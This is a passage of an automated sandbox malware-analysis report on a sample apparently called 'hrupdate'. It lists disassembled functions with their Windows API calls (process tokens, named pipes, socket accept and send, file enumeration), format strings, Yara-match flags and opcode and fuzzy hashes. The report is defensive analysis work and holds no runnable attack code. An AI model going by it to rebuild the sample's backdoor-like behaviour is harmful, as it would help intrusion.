                                      • Opcode ID: 7aa6b3eb46db443fe8da212810350116c20f9b1398704c2f6a9a0f05e67bb74c
                                      • Instruction ID: 8a9e662c097a3f596ff3a24ac9d8518a3256f578de3cdb2ba9b2f4d23c9d1605
                                      • Opcode Fuzzy Hash: 7aa6b3eb46db443fe8da212810350116c20f9b1398704c2f6a9a0f05e67bb74c
                                      • Instruction Fuzzy Hash: 0D316C72800109AFEF01EFA4DD05ADE7BF9FF08314F104119FA14A6150EBB6AE659F55
                                      Function 0469B71B Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0469B734
                                      • GetVersionExA.KERNEL32(?,?,?,0469AF20), ref: 0469B74D
                                      • SetLastError.KERNEL32(00000005,?,?,0469AF20), ref: 0469B772
                                      • SetLastError.KERNEL32(00000006,?,?,?,?,00000000,?,?,?,?,?,?,?,0469AF20), ref: 0469B802
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$Version_memset
                                      • String ID:
                                      • API String ID: 452624306-0
                                      • Opcode ID: cc9db6a7d0ce1bf0b7a964ead605fe79bce6d183bdf3d57d16832e3664883c7b
                                      • Instruction ID: dd539d52b3f8255266db64c480af95d6bb2eb062e5a45095d17f37f143f1c065
                                      • Opcode Fuzzy Hash: cc9db6a7d0ce1bf0b7a964ead605fe79bce6d183bdf3d57d16832e3664883c7b
                                      • Instruction Fuzzy Hash: 0831A671A40114AAEB309E759C45F9B7AF8FB45B10F1004A8E60DEB241F6B4BD458BA5
                                      Function 046B9A98 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 046B9ACC
                                      • __isleadbyte_l.LIBCMT ref: 046B9B00
                                      • MultiByteToWideChar.KERNEL32(6DE0E035,00000009,046C755C,FFFFFB4C,046C755C,00000000,?,?,?,04696E94,046C755C,046C755C,00000000), ref: 046B9B31
                                      • MultiByteToWideChar.KERNEL32(6DE0E035,00000009,046C755C,00000001,046C755C,00000000,?,?,?,04696E94,046C755C,046C755C,00000000), ref: 046B9B9F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: e929438e7dae5660e9a83ab38a6b1dc0f632e1a697cdd9dbaa1a46a837944e44
                                      • Instruction ID: 3f4b3b9a14e542ebd892e7765c91a7e61a8f2d38d1eeac328bcac1a57501bd12
                                      • Opcode Fuzzy Hash: e929438e7dae5660e9a83ab38a6b1dc0f632e1a697cdd9dbaa1a46a837944e44
                                      • Instruction Fuzzy Hash: 0931A071604246EFDB20DF64CC90AFA7BB4FF01310F184569E6A19B291F330E984DB90
                                      Function 046A3F47 Relevance: 6.1, APIs: 4, Instructions: 79sleepsynchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(000003E8,00000080,00000000,00000000,?,?,046949A6), ref: 046A3FAE
                                      • RtlExitUserThread.NTDLL(00000000,00000080,00000000,00000000,?,?,046949A6), ref: 046A3FE7
                                      • WaitForSingleObject.KERNEL32(00000000,?,?,046949A6), ref: 046A4003
                                      • ExitProcess.KERNEL32 ref: 046A400F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exit$ObjectProcessSingleSleepThreadUserWait
                                      • String ID:
                                      • API String ID: 845863014-0
                                      • Opcode ID: 93fc1181961c66d2905de0dc8f6fcf4a67ab6640634f1fe32370de7c926f8147
                                      • Instruction ID: ec67e3a3bc7fae3402bfd2f0ebcc4cee5b68726d7202170418579abe1d24960c
                                      • Opcode Fuzzy Hash: 93fc1181961c66d2905de0dc8f6fcf4a67ab6640634f1fe32370de7c926f8147
                                      • Instruction Fuzzy Hash: E2112672D046107AFF213BB65C84DBF66BCCB93764F10001DF804A63C1FEAAAC905965
                                      Function 04697759 Relevance: 6.1, APIs: 4, Instructions: 78synchronizationpipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0469776C
                                      • CreatePipe.KERNEL32(?,?,?,00100000), ref: 046977A2
                                      • GetStartupInfoA.KERNEL32(?), ref: 046977AC
                                      • WaitForSingleObject.KERNEL32(?,00002710), ref: 046977F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInfoObjectPipeSingleStartupWait_memset
                                      • String ID:
                                      • API String ID: 468459245-0
                                      • Opcode ID: 4e23a65a88d0c17ff32fd43521dfb58b21425a377d7f84ab50a36ebdf0e91b15
                                      • Instruction ID: 0b8cf1649c61694c5030e282958abea93ea063d5842a6cb9bcf2bbbebb906a62
                                      • Opcode Fuzzy Hash: 4e23a65a88d0c17ff32fd43521dfb58b21425a377d7f84ab50a36ebdf0e91b15
                                      • Instruction Fuzzy Hash: 0F214A72D1011CFADF00DFA8CD45ADEBBBDFF09714F10012AE914E6191E7B1AA058BA1
                                      Function 046942FF Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 04694314
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                        • Part of subcall function 04699A21: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000,00002000,?,046942B4,00000000,?,00002000,?,00002000,?,?,?,00000000), ref: 04699A33
                                      • _memset.LIBCMT ref: 04694369
                                      • _memset.LIBCMT ref: 04694378
                                      • _memset.LIBCMT ref: 0469438F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$AllocateEnvironmentExpandHeapStrings_malloc
                                      • String ID:
                                      • API String ID: 2041733451-0
                                      • Opcode ID: c43b576d9f5c09fbac907e10db158cab893dd663d8662aa8bb89cae6441a7a17
                                      • Instruction ID: 64a66d4e954d4c25f5947fe828291f826eed227f83299c77a42878cd49612d4f
                                      • Opcode Fuzzy Hash: c43b576d9f5c09fbac907e10db158cab893dd663d8662aa8bb89cae6441a7a17
                                      • Instruction Fuzzy Hash: FE110871608141BADF109F76CC80BB6BBADDF52168F1400A8E959D3342F762BD16C7A4
                                      Function 046A195D Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset
                                      • String ID:
                                      • API String ID: 2102423945-0
                                      • Opcode ID: 6379b7d325f3b7b15815bf8a4f4040e5a6e7b58cd8fb550da3ae19d7cd86721b
                                      • Instruction ID: a45a8e428444d06dcf13994070e8d96b99e8346b0a8650106d8cefc42501834e
                                      • Opcode Fuzzy Hash: 6379b7d325f3b7b15815bf8a4f4040e5a6e7b58cd8fb550da3ae19d7cd86721b
                                      • Instruction Fuzzy Hash: 2101C8725052147AEB10AEA19CC0EEF3A9DEF062A9F004079FA4996101F679BC51CBB6
                                      Function 04695B89 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 04695BA3
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • htonl.WS2_32(?), ref: 04695BB2
                                      • htonl.WS2_32(?), ref: 04695BBC
                                      • _memset.LIBCMT ref: 04695BDE
                                        • Part of subcall function 046AE93E: __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046AE93E: ___sbh_find_block.LIBCMT ref: 046AE967
                                        • Part of subcall function 046AE93E: ___sbh_free_block.LIBCMT ref: 046AE976
                                        • Part of subcall function 046AE93E: HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                        • Part of subcall function 046AE93E: GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaphtonl$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_malloc_memset
                                      • String ID:
                                      • API String ID: 2558508226-0
                                      • Opcode ID: 1b62cabab4c8febf8d9223634d15d3b0790e9204c53f931a6bf1217cd5c6d3b2
                                      • Instruction ID: fa674226caf80c6fc16feb34c6ee9bd40178d934daf94e80407def3958091164
                                      • Opcode Fuzzy Hash: 1b62cabab4c8febf8d9223634d15d3b0790e9204c53f931a6bf1217cd5c6d3b2
                                      • Instruction Fuzzy Hash: 6B018476501706BAEF126FA1CC40DDF7BACEF41658B00801DF9496A110FB71BE5197E9
                                      Function 046A50FD Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _clock
                                      • String ID:
                                      • API String ID: 876827150-0
                                      • Opcode ID: b758daacf63da5c7291ca6bd382674ea900c029546b509ca3099d54fa5c54ebe
                                      • Instruction ID: b536b47f83ebeca139513601b910ce0ad54c4f80c2e8885bdd66baf70da14cfc
                                      • Opcode Fuzzy Hash: b758daacf63da5c7291ca6bd382674ea900c029546b509ca3099d54fa5c54ebe
                                      • Instruction Fuzzy Hash: FB012D71D00A19FE8B10DFE8C4C45EDBBB4EB10798F5440AED442A7200F6706E51CFA1
                                      Function 046A41F6 Relevance: 6.0, APIs: 4, Instructions: 41threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 046A4203
                                      • OpenThreadToken.ADVAPI32(00000000), ref: 046A420A
                                      • GetCurrentProcess.KERNEL32(00000008,?), ref: 046A422D
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 046A4234
                                        • Part of subcall function 046A417B: __snprintf.LIBCMT ref: 046A41C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken$__snprintf
                                      • String ID:
                                      • API String ID: 3849403947-0
                                      • Opcode ID: 811c913ff2aacd60eda1caa212d1543ff3587d46bae3534bf64f9052f09dce7c
                                      • Instruction ID: 1c780c36be442713cb5cef4af0e6cafccd3a57503fa4fc96f56432a7b9ae64af
                                      • Opcode Fuzzy Hash: 811c913ff2aacd60eda1caa212d1543ff3587d46bae3534bf64f9052f09dce7c
                                      • Instruction Fuzzy Hash: 12F06D71604604BAFB10ABB4EC0ABB9766CEB0464DF10405AB10190091FFE9AD61AE25
                                      Function 046A4F40 Relevance: 6.0, APIs: 4, Instructions: 40networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • accept.WS2_32(?,00000000,00000000), ref: 046A4F4E
                                      • send.WS2_32(00000000,?,?,00000000), ref: 046A4F7B
                                      • send.WS2_32(00000000,?,?,00000000), ref: 046A4F89
                                      • closesocket.WS2_32(00000000), ref: 046A4F94
                                        • Part of subcall function 046A4ED0: closesocket.WS2_32(?), ref: 046A4ED2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: closesocketsend$accept
                                      • String ID:
                                      • API String ID: 2168303407-0
                                      • Opcode ID: de9a7ed50722b3ef9832788215c3f209ea7d03c47be8d987e5d9801edb8f290d
                                      • Instruction ID: 24dbc339ee5db58a17d8a27001e1dbefeca6e1729426bf78b5654cbbd3c67f67
                                      • Opcode Fuzzy Hash: de9a7ed50722b3ef9832788215c3f209ea7d03c47be8d987e5d9801edb8f290d
                                      • Instruction Fuzzy Hash: A7F0BB32100B047AE7303BB4FD40F56B7ADFF48738F10591DF25655491AAA5BC605FA4
                                      Function 0469DFCA Relevance: 6.0, APIs: 4, Instructions: 39memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeProcThreadAttributeList.KERNELBASE(00000000,0469E06D,00000000,00000000), ref: 0469DFE5
                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,0469E06D,00000000), ref: 0469DFEB
                                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0469DFF2
                                      • InitializeProcThreadAttributeList.KERNELBASE(00000000,0469E06D,00000000,00000000), ref: 0469E007
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributeHeapInitializeListProcThread$AllocateProcess
                                      • String ID:
                                      • API String ID: 3402284281-0
                                      • Opcode ID: 23baa818a593eab4c96c340ab917891412a8717836ba3ea1c21e5ee44075a56d
                                      • Instruction ID: ae37441f6fc882850290a90b4717dbf6bff3ed0e2d7e616d94ee8b94746a0a59
                                      • Opcode Fuzzy Hash: 23baa818a593eab4c96c340ab917891412a8717836ba3ea1c21e5ee44075a56d
                                      • Instruction Fuzzy Hash: 58F05E76A00118BB8B11DAE6DD88CEF7EBCDA896947100025FA01D3101F6769E51EB70
                                      Function 0469BE8B Relevance: 6.0, APIs: 4, Instructions: 35sleeppipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469BE9D
                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,0469A5FC,?,00000000), ref: 0469BEB1
                                      • Sleep.KERNEL32(000001F4,?,?,?,0469A5FC,?,00000000), ref: 0469BEC5
                                      • GetTickCount.KERNEL32 ref: 0469BECB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$NamedPeekPipeSleep
                                      • String ID:
                                      • API String ID: 1593283408-0
                                      • Opcode ID: 4fb69b883e89eee85d6364cb264c64ab2f379639f3ea722f44e324eb02889ccf
                                      • Instruction ID: 85ef573e46af014050e00bcb8e7cdbacda9d9850347c8090b25c265981ff9122
                                      • Opcode Fuzzy Hash: 4fb69b883e89eee85d6364cb264c64ab2f379639f3ea722f44e324eb02889ccf
                                      • Instruction Fuzzy Hash: 0BF01C71A0011EBFAF105B95ED848EFBBACEA85AD57144476E601DA101F6F4BD418A60
                                      Function 046B744A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 046B7456
                                        • Part of subcall function 046B061D: __getptd_noexit.LIBCMT ref: 046B0620
                                        • Part of subcall function 046B061D: __amsg_exit.LIBCMT ref: 046B062D
                                      • __getptd.LIBCMT ref: 046B746D
                                      • __amsg_exit.LIBCMT ref: 046B747B
                                      • __lock.LIBCMT ref: 046B748B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                      • String ID:
                                      • API String ID: 3521780317-0
                                      • Opcode ID: f65c208acdbb131fdbdfb307c1b08c771e7fd23bb4c298e414b26217a80ea344
                                      • Instruction ID: 6156a1b4e0f735e4efc16f6ee1f5178679c3fbb1ee0d162b70e7fe464ef25f59
                                      • Opcode Fuzzy Hash: f65c208acdbb131fdbdfb307c1b08c771e7fd23bb4c298e414b26217a80ea344
                                      • Instruction Fuzzy Hash: 3FF01D31A007149AE720AB6494157D97BA0AB81756F04464ED4D0A7680FB647981CBDA
                                      Function 046A23B3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset
                                      • String ID: l.dl$ntdl
                                      • API String ID: 2102423945-1236859653
                                      • Opcode ID: 69ba40200b6beec9a905c53d2e840a4474f04e105710daa9c43c764fd694520b
                                      • Instruction ID: a0fce7f75b5f64261c8cd2b2d34f9f81c61cd70da665010e4f5079f82d1416e0
                                      • Opcode Fuzzy Hash: 69ba40200b6beec9a905c53d2e840a4474f04e105710daa9c43c764fd694520b
                                      • Instruction Fuzzy Hash: 42711374A40609DFCB24CF98C590AACB7F1FF58315B2584AAD904AB355E734EEA1CF90
                                      Function 046A2B72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,046DA64C,00000000,?,?,?,0469611D,046DA64C,00000000,00008000,000002F0,?,00000000,0469632B,?,00000001), ref: 046A2BFD
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$CurrentProcess
                                      • String ID: p,v
                                      • API String ID: 246607088-381846232
                                      • Opcode ID: 6298a64283236a39d42617a9e0c17504cd898e500c85d4987d59fe42d182498d
                                      • Instruction ID: 1debe528673e44e6eec212864524e60a29cb66494d7d49918ad85f99192230be
                                      • Opcode Fuzzy Hash: 6298a64283236a39d42617a9e0c17504cd898e500c85d4987d59fe42d182498d
                                      • Instruction Fuzzy Hash: 7221A0B5981204BBDB68AF90DC94CAB3B6EEB15354B005499F40A92340F679AD25CFA0
                                      Function 00672DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006730B7
                                      • ___raise_securityfailure.LIBCMT ref: 0067319E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                      • String ID: 0bg
                                      • API String ID: 3761405300-1597489500
                                      • Opcode ID: 65f2a0ad1142d573d5d435e0e34aa4b7de559e6363e9e3d6a902099df147114c
                                      • Instruction ID: 3b522c6f46672df64b3ace6561743bb64ebb24edf2a49adb52286be9fc414c92
                                      • Opcode Fuzzy Hash: 65f2a0ad1142d573d5d435e0e34aa4b7de559e6363e9e3d6a902099df147114c
                                      • Instruction Fuzzy Hash: 2B21D3B4511B00DED758CF25E9856507BE6FB48724F10B02AF50D8B3A2E3B15AC4CF49
                                      Function 046A0F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __snprintf
                                      • String ID: %c%c%c%c
                                      • API String ID: 2633826957-103593547
                                      • Opcode ID: b9c91b603de30d91d624f8b50c892411ef86fcd67ee4733386d96d2536c9ed20
                                      • Instruction ID: 041989ac2abcc2aa8294bda0d3c7ec53f4c10ea14d564cfa499b6d83586e0e88
                                      • Opcode Fuzzy Hash: b9c91b603de30d91d624f8b50c892411ef86fcd67ee4733386d96d2536c9ed20
                                      • Instruction Fuzzy Hash: 6FF0C26184064E6EDB05EBA4CC8EEFFBFBC8B08205F000085AA50D2002F625E7598FA0
                                      Function 0469F507 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0469F512
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • __snprintf.LIBCMT ref: 0469F526
                                        • Part of subcall function 0469F544: _malloc.LIBCMT ref: 0469F551
                                        • Part of subcall function 0469F544: __snprintf.LIBCMT ref: 0469F562
                                        • Part of subcall function 0469F544: FindFirstFileA.KERNEL32(00000000,046996DC,?,0469F633,046996DC,?,Function_0000565A), ref: 0469F56F
                                        • Part of subcall function 0469F544: _malloc.LIBCMT ref: 0469F5AE
                                        • Part of subcall function 0469F544: __snprintf.LIBCMT ref: 0469F5C3
                                        • Part of subcall function 0469F544: FindNextFileA.KERNEL32(000000FF,046996DC,?,?,?,?,?,?,?), ref: 0469F5F0
                                        • Part of subcall function 0469F544: FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 0469F5FD
                                        • Part of subcall function 046AE93E: __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046AE93E: ___sbh_find_block.LIBCMT ref: 046AE967
                                        • Part of subcall function 046AE93E: ___sbh_free_block.LIBCMT ref: 046AE976
                                        • Part of subcall function 046AE93E: HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                        • Part of subcall function 046AE93E: GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                                      • String ID: %s\%s
                                      • API String ID: 1254174322-4073750446
                                      • Opcode ID: 867e706bbd33ec37d0863ad4e5216c300ecd3ff44a9047f62de90f8c822bfc28
                                      • Instruction ID: 541c6516642796fa3209e892e8417f9491fbc19b922cfe510b4ec3f2579425b0
                                      • Opcode Fuzzy Hash: 867e706bbd33ec37d0863ad4e5216c300ecd3ff44a9047f62de90f8c822bfc28
                                      • Instruction Fuzzy Hash: 27E08C32481518779F122E92DC00DBF7A2DEF865A4B00402DFE0C61110AA266D316EBA